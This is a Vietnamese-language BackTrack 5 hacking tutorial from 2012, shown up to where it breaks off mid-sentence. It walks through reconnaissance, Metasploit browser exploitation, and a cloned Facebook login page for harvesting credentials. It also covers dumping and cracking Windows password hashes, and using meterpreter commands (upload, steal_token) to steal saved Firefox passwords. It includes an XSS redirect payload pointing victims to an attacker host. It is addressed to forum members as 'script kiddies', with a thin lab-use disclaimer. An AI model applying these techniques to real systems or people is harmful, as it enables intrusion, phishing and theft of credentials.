1. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Tài liệu hướng dẫn sử dụng
BackTrack 5 – Tiếng Việt
Người biên dịch : cutynhangheo@gmail.com Trang 1
2. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Mục lục
Lời nói đầu ................................................................................................................................................... 3
Phần I : Thu thập thông tin và giới thiệu về các công cụ VA ................................................................. 4
1. Thu thập thông tin : ......................................................................................................................... 4
2. Đánh giá lổ hổng : ........................................................................................................................... 6
Phần II : Các bộ công cụ khai thác ( exploit tools ) và frameworks ..................................................... 10
1. Bộ công cụ Metasploit Armitage : ................................................................................................. 10
2. Bộ công cụ Social-Engineer Tookit : ............................................................................................ 11
3. Bộ công cụ leo thang đặc quyền (Privilege escalation tools ) : .................................................... 12
4. Bộ công cụ John the Ripper : ........................................................................................................ 13
Phần III : Các bộ công cụ khai thác và frameworks – tiếp theo ........................................................... 15
1. Đánh cắp các thông tin từ trình duyệt : ....................................................................................... 15
2. Thực nghiệm kỹ thuật đánh cắp thông tin : ................................................................................ 15
3. Bộ công cụ Hashcat trong BackTrack 5 : ..................................................................................... 17
4. Thực nghiệm kỹ thuật leo thang đặc quyền : .............................................................................. 18
5. Khai thác SQL Injection trong BackTrack 5 : .............................................................................. 18
6. Sự thật bất ngờ đằng sau các công cụ mang tên khai thác tự động : .......................................... 19
Phần IV : Làm thế nào để ẩn mình ......................................................................................................... 20
1. Tại sao phải ẩn mình ? .................................................................................................................. 20
2. OS backdoor Cymothoa : .......................................................................................................... 20
3. Meterpreter có phải là backdoor : ................................................................................................. 22
4. Lợi dụng lổ hổng để có backdoor : ................................................................................................ 23
Phần V : Chi tiết một cuộc tấn công giả định ......................................................................................... 24
1. Bộ công cụ Autoscan Network trong BackTrack 5 : .................................................................... 24
2. Tài nguyên lổ hổng trực tuyến : .................................................................................................... 24
3. Pentest mục tiêu : ........................................................................................................................... 25
4. Xóa bỏ dấu vết : .............................................................................................................................. 26
5. Tổng quan về mô hình bảo mật Windows :................................................................................... 26
Người biên dịch : cutynhangheo@gmail.com Trang 2
3. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Lời nói đầu
Tài liệu hướng dẫn này cutynhangheo dành tặng cho anh em HCEGroup và TheGioiMang.OrG nhân
ngày reopen của 2 diễn đàn thân yêu nói trên .Và cutynhangheo có đôi lời tâm sự với anh em mới vào
chơi trò nghệ thuật này cái nhé .Trong nghệ thuật hack không có cái gọi là sự lười biếng và chây ý, anh
em nên quan niệm 1 điều khi ta cảm thấy thỏa mãn với những gì ta đang có tức là lúc đó ta bắt đầu lạc
hậu với thế giới .Trong nghệ thuật hack kiến thức, kỹ năng, tư duy, sự ranh ma và thêm một chút may mắn
luôn luôn đi chung với nhau .Vì vậy nếu ta cảm thấy mình đã có được những gì mình muốn thì lúc đó
mình bắt đầu mất tất cả .Cutynhangheo cũng xin nói rằng tài liệu này chỉ dùng để tham khảo và sử dụng
để thực nghiệm tấn công ( pentest ) trong môi trường lab hoặc cơ quan, tổ chức có nhu cầu tấn công thực
nghiệm trên hệ thống của chính họ .Kiến thức trong cuốn sách hướng dẫn này do cutynhangheo thu thập
và tham khảo nhiều nguồn trên Internet, chân thành cảm ơn các tác giả về nguồn tài liệu mà
cutynhangheo đã tham khảo qua .
Lần nữa cutynhangheo xin nhắc lại tài liệu này cutynhangheo biên dịch lại và cung cấp cho anh em
chỉ nhằm mục đích học tập và nghiên cứu, cutynhangheo không chịu trách nhiệm việc anh em sử dụng
kiến thức, kỹ thuật và tư duy trong cuốn tài liệu này dùng để vi phạm pháp luật nước Cộng Hòa Xã Hội
Chủ Nghĩa Việt Nam .Mọi hành vi mạo danh hay sử dụng các kiến thức nói trên cutynhangheo không chịu
trách nhiệm trước pháp luật .
Người biên dịch : cutynhangheo@gmail.com Trang 3
4. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Phần I : Thu thập thông tin và giới thiệu về các công cụ VA
Phiên bản BackTrack 5 có tên mã là “Revolution” ( tạm dịch là “Cải tiến” ), phiên bản này rất được
giới bảo mật (nhất là giới Hack) mong đợi; phiên bản này được phát hành vào tháng 05 năm 2011 .So với
phiên bản BackTrack 4 R2 thì phiên bản này có nhiều sự phát triển mạnh mẽ hơn rất nhiều .Phiên bản
BackTrack 5 này được cho rằng các nhà phát triển đã xây dựng lại từ đầu, cung cấp cho chúng ta những
cải tiến tốt hơn và cũng như fix các lỗi so với phiên bản BackTrack 4 R2 trước đó .
BackTrack 5 được đặt tên theo một thuật toán được gọi là “backtracking” .BackTrack 5 cung cấp
một bộ các công cụ từ crack password, pentest và scan ports .BackTrack 5 có 12 bộ các công cụ được thể
hiện như hình 1 bên dưới .
Hình 1 : Các bộ công cụ trong BackTrack 5
Người kiểm tra bảo mật ( tạm gọi là Pentester – với những người như anh em chúng ta tạm gọi là
sript kiddies, nói dân dã 1 tí là dân đi hack, cutynhangheo xin nhắc lại là chúng ta chưa phải là hacker
thực thụ OK ! ) thường thực hiện các quá trình tấn công thực nghiệm theo 5 bước ( tùy vào từng môi
trường và trường hợp cụ thể có thể nhiều hơn 5 bước ) như sau :
1. Bước 1 là thu thập thông tin của hệ thống cần tấn công thực nghiệm .
2. Bước 2 là scan bugs ( quét lỗi ) và đánh giá các điểm yếu có thể có của hệ thống cần tấn công
thực nghiệm .
3. Bước 3 là tiếp cận với hệ thống cần tấn công thực nghiệm thông qua các điểm yếu có thể có
của hệ thống đó .
4. Bước 4 là duy trì truy cập với hệ thống cần tấn công thực nghiệm ( nói có vẻ khìn khìn nhưng
cutynhangheo nghĩ đây là bước tạo 1 backdoor cho lần truy cập sau vào hệ thống đó ) .
5. Bước 5 là xóa bỏ tất cả các dấu vết ( trong phim thì gọi là “phi tang, diệt chứng”; hehehe ) .
Trong phần hướng dẫn tấn công thực nghiệm ( pentest ) với BackTrack 5 này, chúng ta sẽ cùng xem
xét qua phần thu thập thông tin và bộ công cụ đánh giá các lổ hổng ( nếu có ) được cung cấp trong phiên
bản BackTrack 5 này nhé .
1. Thu thập thông tin :
Người biên dịch : cutynhangheo@gmail.com Trang 4
5. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Thu thập thông tin là bước tiến hành đầu tiên và cực kỳ quan trọng trong quá trình tấn công thực
nghiệm .Trong bước này, pentester và attacker sẽ thu thập và có được các thông tin sơ bộ của mục
tiêu cần tấn công như hệ thống mạng mục tiêu, các cổng đang mở, hệ thống máy đang live và các
dịch vụ đang chạy trên từng cổng đó .Theo bạn ta thu thập được gì ? Rất đơn giản ta sẽ có được 1
bảng thông tin về sơ đồ cấu trúc của mục tiêu, bên cạnh đó ta còn có thông tin về các hệ thống và hệ
thống mạng đang được sử dụng của mục tiêu .Hình 2 bên dưới đây là hình chụp của công cụ Zenmap,
BackTrack cung cấp công cụ này để giúp pentester và attacker có thể thu thập được thông tin và
phân tích hệ thống mạng của mục tiêu .
Hình 2 : Công cụ Zenmap UI trong BackTrack 5
Các chế độ scan của Zenmap sẽ cung cấp cho ta thông tin về mục tiêu như dịch vụ đang chạy
trên từng cổng, phiên bản hệ điều hành của mục tiêu, đường đi đến mục tiêu, workgroups và tài
khoản người dùng .Các thông tin này thực sự hữu ích với phương pháp “white box testing” ( tất
nhiên cũng hữu ích với attacker ) .
Một công cụ thu thập thông tin khác trong BackTrack 5 đó là CMS identification và IDS – IPS
identification dùng để thu thập thông tin và phân tích cho ứng dụng web .CMS identification sẽ cung
cấp các thông tin sơ bộ về hệ thống CMS mục tiêu, bộ công cụ này có thể được dùng để đánh giá các
lổ hổng trên hệ thống CMS và điều thuận tiện nhất là bộ công cụ này cung cấp các exploit ( khai thác
) có sẵn để pentester và attacker có thể kiểm tra trên hệ thống mục tiêu .Các công cụ như joomscan (
CMS Joomla ) sẽ được nói sau trong phần hướng dẫn này .
Một công cụ thú vị và cực kỳ mạnh khác nữa là Maltego, công cụ này thường dùng để phân tích
về SMTP .Hình 3 bên dưới cho thấy Maltego đang hoạt động .
Người biên dịch : cutynhangheo@gmail.com Trang 5
6. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 3 : Công cụ Maltego UI trong BackTrack 5
Trên bảng Palette của Maltego cho ta thấy các thông tin như DNS Name, Domain, Location,
URL, email và các thông tin chi tiết khác về website .Maltego sử dụng các tùy biến khác nhau trên
các entities cung cấp cho pentester và attacker các thông tin chi tiết cần thiết về mục tiêu .Maltego
cung cấp một kết quả trực quan bằng giao diện đồ họa về các thông tin thu thập được của mục tiêu .
2. Đánh giá lổ hổng :
Bước thứ 2 trong tấn công thực nghiệm pentest là đánh giá các lổ hổng ( nếu có ) .Sau khi đã
thực hiện bước đầu tiên thành công .
Thông tin và sơ đồ tổ chức của mục tiêu có được thông qua footprinting ( nhớ hồi xưa
cutynhangheo đọc đến đây cứ nhớ nhớ là “in dấu ấn” ), lúc này chúng ta sẽ tiến hành đánh giá phân
tích các điểm yếu hoặc các lổ hổng trong hệ thống cần tấn công .Trên internet hiện nay có rất nhiều
trang web về bảo mật cung cấp danh sách các lổ hổng có thể sử dụng để khai thác, nhưng chúng ta sẽ
chỉ tập trung vào những gì BackTrack 5 cung cấp trong series hướng dẫn này nhé .
Web application scans được sử dụng để đánh giá và tìm các lổ hổng của ứng dụng web .Hình 4
bên dưới đây giới thiệu về công cụ joomscan trong BackTrack 5 .Joomscan có tính năng là sử dụng
các lổ hổng được cung cấp trong tài nguyên để tìm kiếm lổ hổng của website chạy trên nền Joomla .
Người biên dịch : cutynhangheo@gmail.com Trang 6
7. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 4 : Công cụ Joomscan
Joomscan sử dụng câu lệnh như sau :
./joomscan.pl –u <string> -x proxy:port
Phần <string> chính là Website chạy Joomla cần tấn công .Joomscan có các tùy chọn kèm theo
như sau kiểm tra phiên bản của Joomla, kiểm tra Server, kiểm tra Firewall đang hoạt động …Như
hình 4 ở trên Website Joomla mục tiêu đang chạy trên máy chủ web Apache Server và phiên bản PHP
đang sử dụng là 5.5.16 .
OpenVAS ( Open Vulnerability Assessment System ) trong BackTrack 5 : Mở Application
Backtrack Vulnerability scanners OpenVAS sẽ cung cấp cho bạn một danh sách các tùy chọn
như hình 5 bên dưới .
Người biên dịch : cutynhangheo@gmail.com Trang 7
8. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 5 : Các tùy chọn của OpenVAS trong BackTrack 5 .
OpenVAS là một công cụ mạnh trong việc phân tích và đánh giá lổ hổng đối với mục tiêu cần tấn
công .Nhưng trước khi sử dụng bộ công cụ này nhà cung cấp khuyến cáo bạn cần thiết lập chứng
thực với tùy chọn OpenVAS MkCert .Sau đó, chúng ta cần tạo một tài khoản người dùng mới từ trình
menu như trong hướng dẫn này .
Người dùng có thể tùy chỉnh để áp dụng các rule của mình, hoặc sẽ được cung cấp một tập hợp
rỗng bằng cách nhấn tổ hợp phím Ctrl + D .Khi một người dùng mới đã được thêm vào với các thông
tin đăng nhập, chúng ta đã có thể bắt đầu sử dụng bộ công cụ này .
Người biên dịch : cutynhangheo@gmail.com Trang 8
9. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 6 : Quá trình thêm tài khoản của OpenVAS
OpenVAS hoạt động đánh giá lổ hổng trên mô hình Client/Server .Bạn nên cập nhật thường
xuyên danh sách các lổ hổng mới cho thư viện của OpenVAS để có thể thực hiện các bước kiểm tra có
hiệu quả nhất .
OpenVAS và Nessus Scanner :
Nessus Scanner là bộ công cụ phân tích và đánh giá lổ hổng tự động .Chúng ta hãy lướt qua
xem sự khác biệt giữa 2 bộ công cụ này .
Nessus Scanner có 2 phiên bản, miễn phí và trả tiền ( cái vụ này làm nhiều dân đi hack như
chúng ta vô cùng ái ngại nhỉ ! Chưa hack mà đã tốn tiền rồi ), trong khi đó OpenVAS thì lại hoàn
toàn miễn phí ( cái này được àh nghen, đừng bao giờ có suy nghĩ đồ free là đồ cùi anh em nhé, có
những đồ free mà chất lượng ngon hơn hẳn đồ trả tiền đàng hoàng, mà xài đồ free thì các bác
muốn đánh bản quyền cũng chẳng có cớ gì xơi được anh em ta ) .Theo đánh giá gần đây cho biết
thì các tài nguyên cung cấp các plugins cho 2 bộ công cụ này có sự khác nhau đáng kể, và tùy
thuộc vào nhận định của mỗi người sẽ đưa ra nhận xét là sẽ có 1 bộ công cụ được khuyên không
nên sử dụng, tất nhiên 1 chương trình scan tự động sẽ có thể đưa ra những đánh giá sai lầm, điều
này là không thể tránh khỏi ( anh em sẽ hỏi cutynhangheo tại sao sai lầm còn giới thiệu,
cutynhangheo xin trả lời vì bản chất chương trình do con người lập trình ra, nó chỉ biết làm theo
chứ nó không có suy nghĩ như con người nhé ).
Trên internet có rất nhiều nhóm được lập ra để hướng dẫn cho nhau cách sử dụng các bộ
công cụ hỗ trợ khác, tất nhiên có cả các bộ công cụ scan tự động, nhưng cutynhangheo xin
khuyến cáo với anh em như sau ta chỉ sử dụng các bộ công cụ scan tự động để đánh giá toàn diện
các lổ hỗng của các mục tiêu cần tấn công .BackTrack 5 cũng cung cấp các bộ công cụ khác
cùng thể loại như các bộ công cụ CISCO, nghĩa là các bộ công cụ này được sử dụng để tìm lổ
hổng trên hệ thống mạng chạy phần cứng CISCO .Các Fuzzer cũng được cung cấp, được phân
thành 2 loại Network Fuzzers và VOIP Fuzzers .
Đó là điều giải thích tại sao BackTrack 5 được cung cấp rất nhiều bộ công cụ để thu thập thông
tin và đánh giá lổ hổng .Trong phần hướng dẫn này cutynhangheo sẽ cố gắng giới thiệu một hoặc hai
bộ công cụ mà cutynhangheo cảm thấy hữu dụng cho anh em nhé ( còn lại nếu anh em muốn nâng
cao skill thì làm ơn tự lên Google Search dùm cái ạh, có 1 câu ngạn ngữ “Tôi chỉ cho cái cần câu
chứ tôi không cho con cá” ) .
Người biên dịch : cutynhangheo@gmail.com Trang 9
10. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Phần II : Các bộ công cụ khai thác ( exploit tools ) và frameworks
Trong phần đầu của cuốn hướng dẫn về BackTrack 5 này, chúng ta đã đi qua 2 bước là thu thập
thông tin và đánh giá lổ hổng với các bộ công cụ được giới thiệu ở trên .Trong phần hai này, chúng ta sẽ
được giới thiệu về các bộ công cụ để khai thác các lổ hổng từ xa và tìm hiểu làm thế nào để sử dụng các
exploitation frameworks để leo thang đặc quyền ví dụ như sử dụng John the Ripper để crack mật khẩu và
truy cập vào một hệ thống Windows từ xa nhé .
1. Bộ công cụ Metasploit Armitage :
Metasploit Armitage là phiên bản giao diện đồ họa của bộ công cụ khai thác lổ hổng nổi tiếng
Metasploit Framework .Cutynhangheo sẽ viết một series về hướng dẫn sử dụng Metasploit trong thời
gian sắp tới và sẽ cung cấp sớm cho anh em .Trong cuốn sách hướng dẫn về BackTrack 5 này, chúng
ta sẽ được giới thiệu cách sử dụng autopwn để khai thác lổ hổng trình duyệt trên hệ thống Windows
XP bằng bộ công cụ Metasploit Armitage .
Hình 7 : Bộ công cụ Metasploit Armitage ; hệ thống Windows bị xâm nhập từ xa được thể hiện bằng màu
đỏ .Giao diện console bên dưới cho thấy quá trình sử dụng autopwn để khai thác lổ hổng trình duyệt trên
hệ thống … Armitage cũng thu thập được thông tin về hệ điều hành của mục tiêu tấn công .
Với phần hướng dẫn khai thác này, anh em cần 1 website bị lỗi cross-site scripting ( XSS ) với lổ
hổng là URL redirection ( chuyển hướng URL ) .Khi victim nhấp chuột vào 1 URL cụ thể nào đó trên
trình duyệt, hệ thống của victim sẽ tạo ra một meterpreter shell .Đoạn code URL redirection sẽ có
dạng như sau :
http://www.xyz?c="><meta HTTPEQUIV="REFRESH" content="0; url=http://attacker">
Người biên dịch : cutynhangheo@gmail.com Trang 10
11. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Tính năng auto-migration được sử dụng khai thác sẽ tạo ra một tiến trình mới trên hệ thống
victim, bởi vì nếu như chúng ta sử dụng phương pháp khai thác lổ hổng không sử dụng migration, thì
cuộc tấn công sẽ bị hủy bỏ hoặc kết thúc khi người dùng đóng trình duyệt .Vì vậy Migration sẽ giúp
chúng ta duy trì trạng thái kết nối liên tục với hệ thống victim cho dù victim có đóng trình duyệt đi
chăng nữa .
Hình 8 : Một minh họa về URL redirection từ 1 website bị lỗi XSS , xyz.com, đến 192.168.13.132 attacker
2. Bộ công cụ Social-Engineer Tookit :
Bộ công cụ Social- Engineer Tookit ( SET ) sẽ được cutynhangheo giới thiệu chi tiết trong một
cuốn sách hướng dẫn khác trong thời gian sắp tới .Trong phần hướng dẫn BackTrack 5 này, chúng ta
sẽ tập trung vào kiểu tấn công được gọi là tab nabbing .Trong một cuộc tấn công giả định, victim mở
1 liên kết trên trình duyệt, ngay sau khi victim chuyển sang 1 tab khác, trang web ban đầu sẽ được
thay thế bằng 1 trang web giả mạo, kiểu tấn công này cho phép các attacker có được các thông tin
đăng nhập của victim .Victim sẽ bị đánh lừa để nhập tên tài khoản và mật khẩu của anh ta vào trang
giả mạo này .
Trong kiểu tấn công “social engineer” này, chúng ta sẽ chọn 1 website để tấn công vector và
clone trang web đó .Chúng ta cần xác định những trang web nào chúng ta cần clone, có các form
đăng nhập thông tin mà chúng ta mong muốn .Cutynhangheo đã clone 1 trang của Facebook cho
phần hướng dẫn BackTrack 5 này với mục đích chỉ là trình diễn ( cutynhangheo không khuyến khích
anh em làm điều tương tự ) .Xin lưu ý anh em rằng quá trình clone sẽ không có tác dụng khi chúng ta
không có kết nối internet nhé .
Hình 9 bên dưới cho thấy trang đăng nhập Facebook giả mạo, và hình 10 bên dưới các dữ liệu
gửi qua phương thức POST bị SET bắt lại .
Phương pháp tấn công này có thể mở rộng với các URL mà anh em dự tính clone, các trang web
sử dụng phương thức POST để đẩy dữ liệu, thông tin đó sẽ luôn bị thu thập lại bởi HTTP hoặc
HTTPS .SET hỗ trợ tốt 2 giao thức trên, và cho kết quả tốt khi sniffs thông tin đăng nhập .
Người biên dịch : cutynhangheo@gmail.com Trang 11
12. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 9 : Một trang đăng nhập giả mạo Facebook được tạo ra bợi bộ công cụ Social-Engineer Toolkit với
các tùy chọn được cấu hình bởi attacker .
Hình 10 : Dữ liệu POST bị thu thập bởi bộ công cụ Social-Engineer Toolkit framework từ 1 trang đăng
nhập giả mạo Facebook .
3. Bộ công cụ leo thang đặc quyền (Privilege escalation tools ) :
Chúng ta biết rằng không phải lúc nào chúng ta cũng có quyền administrator hay superuser để
có thể xâm nhập vào một hệ thống từ xa cả ( dễ ăn quá thì không còn gì là thú vị OK ! ) .Giống như 1
attacker, chúng ta cần một quyền tối đa trên hệ thống victim để có thể thực thi các payloads và thực
hiện các hành động chúng ta mong muốn ( ví dụ leo lên quyền administrator hay get root gì đó )
.BackTrack 5 cung cấp cho chúng ta 1 loạt các bộ công cụ leo thang đặc quyền để đáp ứng những
nhu cầu thực tiễn này, giống hình 11 bên dưới .
Người biên dịch : cutynhangheo@gmail.com Trang 12
13. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 11 : Các phân loại trong bộ công cụ leo thang đặc quyền trong BackTrack 5 .
Như trên hình 11 chúng ta thấy, BackTrack 5 cung cấp 4 phân loại trong bộ công cụ leo thang
đặc quyền, mỗi loại đều có cách làm việc khác nhau ( để hiểu hết các phân loại này, cutynhangheo đề
nghị anh em sử dụng để cảm nhận ) .
4. Bộ công cụ John the Ripper :
Một khi victim đã bị xâm nhập ( cutynhangheo đề nghị anh em chưa biết làm sao xâm nhập xin
đọc lại cuốn hướng dẫn sử dụng SET và MSF của cutynhangheo để biết thêm chi tiết nhé, không giải
thích trong phần hướng dẫn này mệt lắm ), các cracker thường sử dụng bộ công cụ John the Ripper
để crack các Password Windows hashes từ đó sử dụng để leo thang đặc quyền và có được quyền
quản trị hệ thống .
Sau khi khai thác qua lổ hổng, các pass hashes này sẽ được dump lại thành 1 file text và cung cấp
cho John the Ripper .John the Ripper là bộ công cụ rất mạnh về việc crack các password hashes
.Hình 12 và 13 bên dưới thể hiện quá trình crack password hashes liên quan đến việc leo thang đặc
quyền trên hệ thống Windows .Cuộc tấn công như demo có thể sử dụng 2 bộ công cụ Metasploit
Framework hay Social-Engineer Toolkit .
Hình 12 : Đây là quá trình dump password hashes bằng bộ công cụ hashdump, kết quá này sẽ xuất ra file
text để cung cấp cho John the Ripper thực hiện crack pass .
Hệ thống victim theo như hình bên dưới sẽ được liệt kê danh sách các tài khoản và mật khẩu theo
cách của John the Ripper .
Người biên dịch : cutynhangheo@gmail.com Trang 13
14. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 13 : Danh sách được sắp xếp theo Username:Password
Với mật khẩu có trên thì việc leo thang đặc quyền trên hệ thống victim lúc này quả thật quá đơn
giản anh em nhỉ .Trong phân hệ bộ công cụ phân tích các giao thức, chúng ta có 1 bộ công cụ là
WireShark, bộ công cụ này được xếp đầu bảng trong các công cụ phân tích luồng các traffic trên hệ
thống mạng .Cutynhangheo sẽ cố gắng hoàn thiện cuốn sách nói về bộ công cụ WireShark này trong
thời gian sớm nhất cho anh em.
Đây là bằng chứng cho việc BackTrack 5 đã phát triển rất rất nhiều .Một attacker thông minh và
ranh ma có thể tận dụng và sử dụng tối đa các bộ công cụ này, và attacker có thể kết hợp chúng lại
để đa dạng hóa và tối đa hóa cho lợi ích của attacker .Trong phần hướng dẫn này, cutynhangheo xin
nhấn mạnh lại việc quan trọng nhất trong một cuộc tấn công giả định là sử dụng các công cụ để leo
thang đặc quyền .Trong phần hướng dẫn tiếp theo cutynhangheo sẽ cung cấp thêm cho anh em một số
kỹ thuật leo thang đặc quyền khác nữa ( để biết được nhiều hơn chỉ có chăm chỉ, cần cù ngồi đọc và
search giáo sư Google nhé ) .
Người biên dịch : cutynhangheo@gmail.com Trang 14
15. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Phần III : Các bộ công cụ khai thác và frameworks – tiếp theo
Khi BackTrack 5 phát hành vào tháng 05 năm 2011, đã có rất nhiều bộ công cụ pentest frameworks
được chờ đợi .Chính điề này đã khiến cutynhangheo quyết tâm viết phần hướng dẫn sử dụng BackTrack 5
phần thứ 3 này để cùng anh em tìm hiều và khám phá các bộ công cụ khai thác các lỗi của trình duyệt
chẳng hạn như đánh cắp thông tin quan trọng, leo thang đặc quyền Website và khôi phục mật khẩu .Đây
là một phần trong cuốn sách hướng dẫn sử dụng BackTrack 5 này, cutynhangheo sẽ cung cấp cho anh em
cái nhìn tổng quan về khai thác tự động với lỗi SQL Injection bằng cách sử dụng bộ công cụ
DarkMySQLi .
1. Đánh cắp các thông tin từ trình duyệt :
Phần hướng dẫn trước cutynhangheo đã có giới thiệu qua về cách để khai thác mục tiêu victim
bằng cách sử dụng các payloads .Trong phần này cutynhangheo sẽ sử dụng các modules của
Metasploit Framework để tấn công hệ thống Windows, đánh cắp các thông tin trình duyệt lưu trữ
trong Mozilla Firefox chạy trên hệ thống Windows XP .Một bộ công cụ của nhà cung cấp thứ 3 có tên
gọi là Firepassword sẽ lấy tất cả thông tin mật khẩu được lưu trữ trên trình duyệt Mozilla Firefox
trên hệ thống victim .
Chúng ta sẽ sử dụng lổ hổng phổ biến là WinXP RPC DCOM để khai thác và xâm nhập hệ thống
victim, khởi tạo 1 Metasploit Shell và thực hiện các bước để khai thác thông tin .Nếu victim có sử
dụng tính năng Master Password trong Mozilla Firefox, đây là thông tin quan trọng nhất ta cần phải
lấy đầu tiên, vì nếu ta có Master Password ta có thể xem được các mật khẩu khác trong Mozilla
Firefox 1 cách cực kỳ dễ dàng .Thông thường thì Master Password rất ít khi được sử dụng, chính vì
thế điều này cho phép chúng ta có thể dễ dàng lấy các thông tin được lưu trữ trong trình duyệt .
2. Thực nghiệm kỹ thuật đánh cắp thông tin :
Mục tiêu cần đạt đến của pentester và hacker mũ đen là giống nhau về phương thức thực hiện, cụ
thể là xâm nhập vào hệ thống mạng và đánh cắp thông tin dữ liệu .Tuy nhiên, với hacker mũ đen họ
sẽ đem thông tin đó đem bán cho những ai cần đến hoặc sử dụng cho mục đích khác, thì pentester sẽ
thông báo các dữ liệu bị đánh cắp đó cho cơ quan, tổ chức đã yêu cầu anh ta thực hiện quá trình
pentest, với tính toàn vẹn, bảo mật và trách nhiệm .
Các thông tin thường bị đánh cắp nhất bao gồm thông tin cá nhân vì thông tin này có thể sử dụng
cho kiểu tấn công social engineering, thẻ tín dụng hoặc các thông tin chi tiết về tài chính; và có thể
có cả biên lai và hóa đơn hoặc các thông tin nhạy cảm của công ty trong hộp thư email .Nói chung
mọi thứ nhạy cảm thì hacker mũ đen họ đều muốn đánh cắp .
Vì vậy, kiểm tra bất kỳ các dữ liệu có thể sẽ bị đánh cắp là một bước rất quan trông trong quá
trình pentest, nó chính là một báo cáo đầy đủ và trung thực nhất cho cơ quan, tổ chức đó .Hình 14
bên dưới cho thấy sự thiệt hại sẽ có của victim .
Người biên dịch : cutynhangheo@gmail.com Trang 15
16. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 14 : Quá trình xâm nhập thành công trên hệ thống Windows XP .
Tại đây, như phần nói ở trên, chúng ta sẽ thực hiện tải firepassword.exe lên hệ thống của victim
để thực hiện quá trình đánh cắp mật khẩu được lưu trữ trên Firefox .
Sử dụng câu lệnh upload để thực hiện quá trình tải file lên trong môi trường meterpreter shell .
Một file Firepassword đã được tải lên ( Hình 15 ) .Và dữ liệu sẽ được nhìn thấy như hình 16 .
Hình 15 : File Firepassword.exe đã được tải lên thành công trên hệ thống victim .
Bây giờ chúng ta chỉ cần chạy file Firepassword.exe để thấy được các mật khẩu có trong hệ
thống .Nhưng ( hè hè …anh em nên nhớ không có cái gì được gọi là đơn giản trong trò chơi cả, nhất
là trong nghệ thuật hack nhé, nếu đơn giản và dễ làm thì đã có khối người làm được không đến phiên
chúng ta nhé ) có một điều cần phải chú ý ở đây .Điều này sẽ hữu ích cho tư duy của anh em ( nếu
anh em xem hack là một niềm đam mê nhé ), đó là chúng ta cần kiểm tra cấp độ người dùng của
victim một khi anh em đã xâm nhập vào hệ thống của victim .Ví dụ dưới đây sẽ giải thích cho anh em
dễ hiểu hơn nhé, khi ta xâm nhập vào hệ thống Windows XP với quyền “System”, nhưng để cho file
Firepassword.exe chạy được ta cần phải có quyền “Administrator” .Do đó, để thay đổi cấp độ người
dùng chúng ta có thể sử dụng phương pháp sau .
2.1. Sử dụng câu lệnh ps trong môi trường meterpreter để liệt kê tất cả các tiến trình đang thực
hiện trên hệ thống victim theo PIDs, tìm tiến trình explorer.exe hoặc bất kỳ một tiến trình nào
đang thực hiện với quyền “Administrator” .
Người biên dịch : cutynhangheo@gmail.com Trang 16
17. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
2.2. Bây giờ chúng ta sao chép PID này và sử dụng câu lệnh steal_token để thay đổi cấp độ
quyền của user thành quyền “Administrator” .
2.3. Để kiểm tra quyền user hiện tại mà anh em đang truy cập, sử dụng câu lệnh getuid trong môi
trường meterpreter shell .
Một khi đã trở thành Administrator, anh em chạy file Firepassword.exe để mở Windows shell
trong môi trường meterpreter và kiểm tra các mật khẩu được lưu trữ như trong hình 16 bên dưới đây.
Hình 16 : Các tài khoản và mật khẩu được lưu trữ được hiển thị khi sử dụng Firepassword.exe
Đối với hướng dẫn trên, anh em cần lưu ý một điều là tiến trình chỉ được thực hiện thành công
khi anh em biết được Master password trong trình duyệt Mozilla Firefox .Chín trong số mười lần
thực hiện thì cutynhangheo nhận thấy tính năng Master password ít được người sử dụng lưu tâm mà
thiết lập nó, và các thông tin có thể sẽ bị đánh cắp .Vì vậy, trong trò chơi này luôn luôn kèm theo tính
may mắn nhé anh em .
Ngoài ra cũng có một số bộ công cụ khác được cung cấp bởi bên thứ 3 dùng để đánh cắp các mật
khẩu trên các trình duyệt khác nữa .
3. Bộ công cụ Hashcat trong BackTrack 5 :
Hashcat là bộ công cụ miễn phí, có nhiều cải tiến, đa nền tảng, công cụ phục hồi mật khẩu trên
nhiều hệ điều hành .Các nền tảng được hỗ trợ bao gồm CUDA, OpenCL và CPU, và một số khác …
Người biên dịch : cutynhangheo@gmail.com Trang 17
18. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Hình 17 : Các câu lệnh của Hashcat trong BackTrack 5
Trong phần hướng dẫn này, như trên hình 17 anh em có thể thấy được cú pháp để sử dụng
Hashcat với lời chú thích rõ ràng cho mỗi tùy chọn .Các tùy chọn này được phân loại như sau :
3.1. Khởi động chương trình .
3.2. Đăng nhập và các file của chương trình .
3.3. Quản lý tài nguyên hệ thống .
3.4. Các kiểu tấn công, bao gồm brute force, table lookups và permutations .
4. Thực nghiệm kỹ thuật leo thang đặc quyền :
Một cuộc tấn công thường theo các cách chủ yếu như sau nghĩa là khi xâm nhập vào hệ thống
victim anh em thường sẽ có quyền hạn user rất thấp hoặc có thể nói là bình thường .Bước sau đó, là
cần kiểm tra các lổ hổng local để ta có thể từ đó leo thang lên quyền cao nhất của hệ thống victim
.Điều này cực kỳ quan trọng, để ta có được các quyền như mong muốn, yêu cầu chúng ta cần thực
hiện quá trình đánh giá mức độ an ninh của hệ thống victim .Các bộ công cụ như “Backtrack
Privilege escalation Online attacks / Offline attacks” đã được phát triển để làm những việc này.
Hầu hết các tiến trình trong hệ thống Windows đều có thể được thực thi với quyền
